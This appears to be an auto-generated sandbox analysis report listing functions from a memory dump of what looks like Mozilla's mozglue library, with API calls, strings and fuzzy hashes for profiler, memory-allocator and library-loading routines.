Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$mallocmoz_xmalloc
String ID:
API String ID: 1880959753-0
Opcode ID: 033aac1d5b908ba041751c49644646febc30e91fc6b966ef57f75bef413e4c48
Instruction ID: e0ca5f84c1c49725f5b3d77e5b1746a1b33326f9e4611947fc41c78d007c4a74
Opcode Fuzzy Hash: 033aac1d5b908ba041751c49644646febc30e91fc6b966ef57f75bef413e4c48
Instruction Fuzzy Hash: 4341AC752007019FCB14DF28D888B96BBF5FF49358F10842EE95A87B41CB31E854CB90

Function 6C9C38A0 Relevance: 10.6, APIs: 7, Instructions: 80memoryCOMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6CA3E220,?,?,?,?,6C9C3899,?), ref: 6C9C38B2
ReleaseSRWLockExclusive.KERNEL32(6CA3E220,?,?,?,6C9C3899,?), ref: 6C9C38C3
free.MOZGLUE(00000000,?,?,?,6C9C3899,?), ref: 6C9C38F1
RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C9C3920
RtlFreeUnicodeString.NTDLL(-0000000C,?,?,?,6C9C3899,?), ref: 6C9C392F
RtlFreeUnicodeString.NTDLL(-00000014,?,?,?,6C9C3899,?), ref: 6C9C3943
RtlFreeHeap.NTDLL(?,00000000,0000002C), ref: 6C9C396E

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: Free$ExclusiveHeapLockStringUnicode$AcquireReleasefree
String ID:
API String ID: 3047341122-0
Opcode ID: 188391d20ff204448e78e278284ab46d507f039fd1900ed4893644024096ae67
Instruction ID: b176502277fd3f4cc2b2c835990472214e2a04662a75f88e6bf977999dd64c1a
Opcode Fuzzy Hash: 188391d20ff204448e78e278284ab46d507f039fd1900ed4893644024096ae67
Instruction Fuzzy Hash: E0212172700B20DFE720DF25C880BC6B7A9FF48728F258429D95A97B00C734E885CB92

Function 6C9F84E0 Relevance: 10.6, APIs: 7, Instructions: 79COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C9F84F3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C9F850A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C9F851E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C9F855B
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C9F856F
??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C9F85AC

Part of subcall function 6C9F7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C9F85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C9F767F
Part of subcall function 6C9F7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C9F85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C9F7693
Part of subcall function 6C9F7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C9F85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C9F76A7

free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C9F85B2

Part of subcall function 6C9D5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C9D5EDB
Part of subcall function 6C9D5E90: memset.VCRUNTIME140(6CA17765,000000E5,55CCCCCC), ref: 6C9D5F27
Part of subcall function 6C9D5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C9D5FB2

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
String ID:
API String ID: 2666944752-0
Opcode ID: 33e571a49a91989573812f50ff5180085e7d6af6f02b62bbb32ade2e9605a617
Instruction ID: 4e288b035d39b7919b2ba45843d143c81449d0b624c1e00128e54ed9f8ea9f0d
Opcode Fuzzy Hash: 33e571a49a91989573812f50ff5180085e7d6af6f02b62bbb32ade2e9605a617
Instruction Fuzzy Hash: 1621E1752007019FDB18DB25CC88A5A77B8AF8230DF10492CE56BC3B41DB35F84ACB45

Function 6C9C1640 Relevance: 10.6, APIs: 7, Instructions: 77COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,00000114), ref: 6C9C1699
VerSetConditionMask.NTDLL ref: 6C9C16CB
VerSetConditionMask.NTDLL ref: 6C9C16D7
VerSetConditionMask.NTDLL ref: 6C9C16DE
VerSetConditionMask.NTDLL ref: 6C9C16E5
VerSetConditionMask.NTDLL ref: 6C9C16EC
VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C9C16F9

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: ConditionMask$InfoVerifyVersionmemset
String ID:
API String ID: 375572348-0
Opcode ID: ee9c5e97dee574826c934bf3ed52d74967dd9c7dc2b61e4b3d8ae96d4e84aeed
Instruction ID: 9fea01200a05230247e030937dc6103d1b1d964f9c7e828c62e1629c8452a611
Opcode Fuzzy Hash: ee9c5e97dee574826c934bf3ed52d74967dd9c7dc2b61e4b3d8ae96d4e84aeed
Instruction Fuzzy Hash: 8221C0B07403096BEB256A689C99FBAB27CEF96704F048528F6099B180C678DD54C7A6

Function 6C9FF5B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C9ECBE8: GetCurrentProcess.KERNEL32(?,6C9B31A7), ref: 6C9ECBF1
Part of subcall function 6C9ECBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C9B31A7), ref: 6C9ECBFA

Part of subcall function 6C9F9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C9C4A68), ref: 6C9F945E
Part of subcall function 6C9F9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C9F9470
Part of subcall function 6C9F9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C9F9482
Part of subcall function 6C9F9420: __Init_thread_footer.LIBCMT ref: 6C9F949F

GetCurrentThreadId.KERNEL32 ref: 6C9FF619
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C9FF598), ref: 6C9FF621

Part of subcall function 6C9F94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C9F94EE
Part of subcall function 6C9F94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C9F9508

GetCurrentThreadId.KERNEL32 ref: 6C9FF637
AcquireSRWLockExclusive.KERNEL32(6CA3F4B8,?,?,00000000,?,6C9FF598), ref: 6C9FF645
ReleaseSRWLockExclusive.KERNEL32(6CA3F4B8,?,?,00000000,?,6C9FF598), ref: 6C9FF663

Strings

[D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C9FF62A

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: Currentgetenv$ExclusiveLockProcessThread$AcquireInit_thread_footerReleaseTerminate__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
API String ID: 1579816589-753366533
Opcode ID: 42949c4f7219fd165dffdd7ee7305227cf2d911b32ca9ad0a6de9c18f3ee5a80
Instruction ID: af6600f93904d530f67fd4dd4d42e9775ec7d24e4118a56094999ad008069786
Opcode Fuzzy Hash: 42949c4f7219fd165dffdd7ee7305227cf2d911b32ca9ad0a6de9c18f3ee5a80
Instruction Fuzzy Hash: F9110431201716AFCB18AF18DD189E577BAFB9635CB10005AEA19C3F41CB31E817CBA0

Function 6C9C1FA0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C9EAB89: EnterCriticalSection.KERNEL32(6CA3E370,?,?,?,6C9B34DE,6CA3F6CC,?,?,?,?,?,?,?,6C9B3284), ref: 6C9EAB94
Part of subcall function 6C9EAB89: LeaveCriticalSection.KERNEL32(6CA3E370,?,6C9B34DE,6CA3F6CC,?,?,?,?,?,?,?,6C9B3284,?,?,6C9D56F6), ref: 6C9EABD1

LoadLibraryW.KERNEL32(combase.dll,?), ref: 6C9C1FDE
GetProcAddress.KERNEL32(00000000,CoCreateInstance), ref: 6C9C1FFD
__Init_thread_footer.LIBCMT ref: 6C9C2011
FreeLibrary.KERNEL32 ref: 6C9C2059

Strings

combase.dll, xrefs: 6C9C1FD9
CoCreateInstance, xrefs: 6C9C1FF7

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
String ID: CoCreateInstance$combase.dll
API String ID: 4190559335-2197658831
Opcode ID: da3f0130ea77be4b19d124eca7b05aee020b3655a4399ed2ec6667a453fe44c9
Instruction ID: cbf5716fc56c015db25cb1f1b72ef2d6d741f4578542954f22a9a30d68ece737
Opcode Fuzzy Hash: da3f0130ea77be4b19d124eca7b05aee020b3655a4399ed2ec6667a453fe44c9
Instruction Fuzzy Hash: F6116A75340706EFDF28DF54DC6AE963B79EB8A359F10806AE909C2640C731D842CB72

Function 6C9C0EE0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 51libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C9EAB89: EnterCriticalSection.KERNEL32(6CA3E370,?,?,?,6C9B34DE,6CA3F6CC,?,?,?,?,?,?,?,6C9B3284), ref: 6C9EAB94
Part of subcall function 6C9EAB89: LeaveCriticalSection.KERNEL32(6CA3E370,?,6C9B34DE,6CA3F6CC,?,?,?,?,?,?,?,6C9B3284,?,?,6C9D56F6), ref: 6C9EABD1

LoadLibraryW.KERNEL32(combase.dll,00000000,?,6C9ED9F0,00000000), ref: 6C9C0F1D
GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 6C9C0F3C
__Init_thread_footer.LIBCMT ref: 6C9C0F50
FreeLibrary.KERNEL32(?,6C9ED9F0,00000000), ref: 6C9C0F86

Strings

combase.dll, xrefs: 6C9C0F18
CoInitializeEx, xrefs: 6C9C0F36

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
String ID: CoInitializeEx$combase.dll
API String ID: 4190559335-2063391169
Opcode ID: dab3917559d4faff1f57f9576c2bf16130dea2ee84b9acadce07e0c02c49ef07
Instruction ID: b0f2fff5039fd4f75c75b4f15ef23079607e357b182daeab0627c800dd6b4dc2
Opcode Fuzzy Hash: dab3917559d4faff1f57f9576c2bf16130dea2ee84b9acadce07e0c02c49ef07
Instruction Fuzzy Hash: 9011C1B1701342ABDF28DF58EE28E453778FB8A326F00825DE90DC2680D730D442CA72

Function 6C9FF540 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C9F9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C9C4A68), ref: 6C9F945E
Part of subcall function 6C9F9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C9F9470
Part of subcall function 6C9F9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C9F9482
Part of subcall function 6C9F9420: __Init_thread_footer.LIBCMT ref: 6C9F949F

GetCurrentThreadId.KERNEL32 ref: 6C9FF559
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C9FF561

Part of subcall function 6C9F94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C9F94EE
Part of subcall function 6C9F94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C9F9508

GetCurrentThreadId.KERNEL32 ref: 6C9FF577
AcquireSRWLockExclusive.KERNEL32(6CA3F4B8), ref: 6C9FF585
ReleaseSRWLockExclusive.KERNEL32(6CA3F4B8), ref: 6C9FF5A3

Strings

[I %d/%d] profiler_resume, xrefs: 6C9FF239
[D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6C9FF56A
[I %d/%d] profiler_pause_sampling, xrefs: 6C9FF3A8
[I %d/%d] profiler_resume_sampling, xrefs: 6C9FF499

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
API String ID: 2848912005-2840072211
Opcode ID: 5543e17482a8724f8786c6b7c6f3424cb0024bd9bd7c732a0b70e27f0a1b6d9f
Instruction ID: e310f5d9607a2e1cfe0abbcb435e946f85e0ababdfe2a1cbb8c27f6f3c1b3666
Opcode Fuzzy Hash: 5543e17482a8724f8786c6b7c6f3424cb0024bd9bd7c732a0b70e27f0a1b6d9f
Instruction Fuzzy Hash: 39F024722003119FDB146F28AC28AAA77BEEB9629DF108015FA0DC3302CB31C803CB60

Function 6C9FF600 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C9F9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C9C4A68), ref: 6C9F945E
Part of subcall function 6C9F9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C9F9470
Part of subcall function 6C9F9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C9F9482
Part of subcall function 6C9F9420: __Init_thread_footer.LIBCMT ref: 6C9F949F

GetCurrentThreadId.KERNEL32 ref: 6C9FF619
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C9FF598), ref: 6C9FF621

Part of subcall function 6C9F94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C9F94EE
Part of subcall function 6C9F94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C9F9508

GetCurrentThreadId.KERNEL32 ref: 6C9FF637
AcquireSRWLockExclusive.KERNEL32(6CA3F4B8,?,?,00000000,?,6C9FF598), ref: 6C9FF645
ReleaseSRWLockExclusive.KERNEL32(6CA3F4B8,?,?,00000000,?,6C9FF598), ref: 6C9FF663

Strings

[D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C9FF62A

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
API String ID: 2848912005-753366533
Opcode ID: fa8a13792bb94641989e5ef86024b19bd7d4848540c3e598651094165ed08d7d
Instruction ID: e0568f237974557386a83dea4368af03d16ff4504ffbacc97c5d4b30a9f8f7ad
Opcode Fuzzy Hash: fa8a13792bb94641989e5ef86024b19bd7d4848540c3e598651094165ed08d7d
Instruction Fuzzy Hash: 91F02471200315AFDB142F289C28A9A77BEEB962ADF108055FA4DC3342CB318C03CB70

Function 6C9C0E40 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(kernel32.dll,6C9C0DF8), ref: 6C9C0E82
GetProcAddress.KERNEL32(00000000,GetProcessMitigationPolicy), ref: 6C9C0EA1
__Init_thread_footer.LIBCMT ref: 6C9C0EB5
FreeLibrary.KERNEL32 ref: 6C9C0EC5

Strings

kernel32.dll, xrefs: 6C9C0E7D
GetProcessMitigationPolicy, xrefs: 6C9C0E9B

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: Library$AddressFreeInit_thread_footerLoadProc
String ID: GetProcessMitigationPolicy$kernel32.dll
API String ID: 391052410-1680159014
Opcode ID: 3cbc10841c1b93740320acf0d710f25bd61e6ae94ef969a8b3810054ef660105
Instruction ID: 715e29703a32e6a1cd736d4ed5b0fba538e20af4c21e4faee7f05b20d05d81bd
Opcode Fuzzy Hash: 3cbc10841c1b93740320acf0d710f25bd61e6ae94ef969a8b3810054ef660105
Instruction Fuzzy Hash: 870178B07503968BDB289FA8DD38A4237B6F706314F1492A9D90CC3B80DB30E4468A17

Function 6C9F05F0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 31stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(<jemalloc>,?,?,?,?,6C9ECFAE,?,?,?,6C9B31A7), ref: 6C9F05FB
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,<jemalloc>,00000000,6C9ECFAE,?,?,?,6C9B31A7), ref: 6C9F0616
strlen.API-MS-WIN-CRT-STRING-L1-1-0(: (malloc) Error in VirtualFree(),?,?,?,?,?,?,?,6C9B31A7), ref: 6C9F061C
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,: (malloc) Error in VirtualFree(),00000000,?,?,?,?,?,?,?,?,6C9B31A7), ref: 6C9F0627

Strings

: (malloc) Error in VirtualFree(), xrefs: 6C9F061B, 6C9F0625
<jemalloc>, xrefs: 6C9F05FA, 6C9F060F

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: _writestrlen
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 2723441310-2186867486
Opcode ID: cd26725152fb9fa08f5ce60c86cb37bb62f3371e8ccc4ffd2b22fbacba210a45
Instruction ID: 1c5bb711486e31eecc1a645df7bb1cb1777061fd537fa478c07a1bb270f2f211
Opcode Fuzzy Hash: cd26725152fb9fa08f5ce60c86cb37bb62f3371e8ccc4ffd2b22fbacba210a45
Instruction Fuzzy Hash: 19E08CE2A0116037F614225ABC86DBBB65CDBC6238F080139FD0D83301E94EED1E51F6

Function 6C9C05F0 Relevance: 9.2, APIs: 6, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ed904c31e5ccff24c3afeed701832b83aa3b77642202fe48db01c04e5eda96a
Instruction ID: f1ba4c0fee3de21cb139933d6edcc1986f5b798622d51cddd8783df55e58ea64
Opcode Fuzzy Hash: 4ed904c31e5ccff24c3afeed701832b83aa3b77642202fe48db01c04e5eda96a
Instruction Fuzzy Hash: 95A15CB0A00745CFDB28CF29C994A99FBF5BF49304F44866ED44997B40D730A955CF92

Function 6CA114A0 Relevance: 9.2, APIs: 6, Instructions: 176threadtimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6CA114C5
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CA114E2
GetCurrentThreadId.KERNEL32 ref: 6CA11546
InitializeConditionVariable.KERNEL32(?), ref: 6CA115BA
free.MOZGLUE(?), ref: 6CA116B4

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
String ID:
API String ID: 1909280232-0
Opcode ID: dc04847bdf2bead443305c1b40f81ff0672189f2420548b12ec2c17866f4212f
Instruction ID: 2f85fd07155977bdaced8a0307c39f9f0a9c77f9fd4c91187edb3c542236d48d
Opcode Fuzzy Hash: dc04847bdf2bead443305c1b40f81ff0672189f2420548b12ec2c17866f4212f
Instruction Fuzzy Hash: F061F375A047009BDB218F24D880BEE77B5BF99308F04851CEE8A57B01DB35E989CB91

Function 6CA09F40 Relevance: 9.2, APIs: 6, Instructions: 157timeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CA09FDB
free.MOZGLUE(?,?), ref: 6CA09FF0
free.MOZGLUE(?,?), ref: 6CA0A006
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CA0A0BE
free.MOZGLUE(?,?), ref: 6CA0A0D5
free.MOZGLUE(?,?), ref: 6CA0A0EB

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: free$StampTimeV01@@Value@mozilla@@
String ID:
API String ID: 956590011-0
Opcode ID: 714541ae9983c2b6a9725fc2f67a66405d06576e72719014d8e917aca64769a1
